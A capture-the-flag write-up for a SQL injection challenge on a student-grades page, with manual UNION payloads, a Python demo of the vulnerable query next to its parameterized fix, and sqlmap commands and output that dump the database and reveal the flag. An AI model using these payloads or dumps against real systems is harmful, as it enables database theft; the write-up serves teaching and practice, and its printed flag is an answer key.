http://123.206.87.240:8002/chengjidan/


Solution:

Version 1 (manual UNION injection)

Input: 0' union select database(),2,3,4 #

Database name: skctf_flag

Input: 0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#

Table name: fl4g

Input: 0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#

Column name: skctf_flag

Input: 0' union select skctf_flag,2,3,4 from fl4g#

flag: BUGKU{Sql_INJECT0N_4813drd8hz4}
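Why Version 1 works, and the fix the application needed, as an added example that is not part of the original writeup: it rebuilds the page's `sc` table in SQLite (Python's stdlib sqlite3) and runs the same kind of four-column UNION payload against a string-concatenated query and against a parameterized one. The query text, the `fl4g` placeholder value and the use of `--` in place of MySQL's `#` comment marker are assumptions made for SQLite.

```python
import sqlite3

# Constructed sample rows mirroring the 'sc' table shown in the sqlmap dump on this page.
SC_ROWS = [
    (1, "龙龙龙", 60, 70, 60),
    (2, "浩儿", 70, 74, 84),
    (3, "静静", 80, 90, 85),
]

# The page's payload adapted to SQLite: the same quote break-out and the same
# four columns (fl4g has one column, padded with 2,3,4), but '--' ends the
# line instead of MySQL's '#'.
INJECTED_ID = "0' UNION SELECT skctf_flag,2,3,4 FROM fl4g--"


def make_db():
    """Build an in-memory database with the two tables named in the writeup."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sc (id INTEGER, name TEXT, math INTEGER, chinese INTEGER, english INTEGER)"
    )
    conn.executemany("INSERT INTO sc VALUES (?,?,?,?,?)", SC_ROWS)
    # Placeholder value; the real flag from the page is not reproduced here.
    conn.execute("CREATE TABLE fl4g (skctf_flag TEXT)")
    conn.execute("INSERT INTO fl4g VALUES ('FLAG{placeholder}')")
    return conn


def lookup_vulnerable(conn, user_id):
    """The bug: the POST 'id' value is pasted into the SQL text, so a quote in it
    closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT name, math, chinese, english FROM sc WHERE id='%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """The fix: the value is bound as a parameter, so it is only ever compared
    against id and never parsed as SQL."""
    sql = "SELECT name, math, chinese, english FROM sc WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal id=2   ->", lookup_safe(db, "2"))
    print("vulnerable    ->", lookup_vulnerable(db, INJECTED_ID))  # leaks the fl4g row
    print("parameterized ->", lookup_safe(db, INJECTED_ID))        # []
```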

Version 2 (sqlmap)

Tool: sqlmap

Use sqlmap to detect the SQL injection

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"

Result

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'fELh'='fELh
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP
---
[11:01:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

Database: MySQL


Enumerate databases

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs

Result

available databases [2]:
[*] information_schema
[*] skctf_flag

Database: skctf_flag


Enumerate the tables in database skctf_flag (the command below uses --dump, which goes on to dump every table; sqlmap prints the table list first, and --tables alone would stop at that list)

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

Result

Database: skctf_flag
[2 tables]
+------+
| fl4g |
| sc   |
+------+

Tables in skctf_flag:

fl4g

sc


Dump the contents

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

Result

Database: skctf_flag
Table: sc
[3 entries]
+----+------+------+---------+---------+
| id | name | math | chinese | english |
+----+------+------+---------+---------+
| 1  | 龙龙龙  | 60   | 70      | 60      |
| 2  | 浩儿   | 70   | 74      | 84      |
| 3  | 静静   | 80   | 90      | 85      |
+----+------+------+---------+---------+
 
[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv'
[11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................  (done)
[11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait..............................  (done)
[11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times
BUGKU
 
[11:18:42] [ERROR] invalid character detected. retrying..
[11:18:42] [WARNING] increasing time delay to 3 seconds
{Sq
 
[11:20:01] [ERROR] invalid character detected. retrying..
[11:20:01] [WARNING] increasing time delay to 4 seconds
l_INJE
 
[11:21:48] [ERROR] invalid character detected. retrying..
[11:21:48] [WARNING] increasing time delay to 5 seconds
CT0N_4
 
[11:24:01] [ERROR] invalid character detected. retrying..
[11:24:01] [WARNING] increasing time delay to 6 seconds
81
 
[11:24:54] [ERROR] invalid character detected. retrying..
[11:24:54] [WARNING] increasing time delay to 7 seconds
3dr
 
[11:26:24] [ERROR] invalid character detected. retrying..
[11:26:24] [WARNING] increasing time delay to 8 seconds
d
 
[11:27:10] [ERROR] invalid character detected. retrying..
[11:27:10] [WARNING] increasing time delay to 9 seconds
8hz4}
Database: skctf_flag
Table: fl4g
[1 entry]
+---------------------------------+
| skctf_flag                      |
+---------------------------------+
| BUGKU{Sql_INJECT0N_4813drd8hz4} |
+---------------------------------+

flag: BUGKU{Sql_INJECT0N_4813drd8hz4}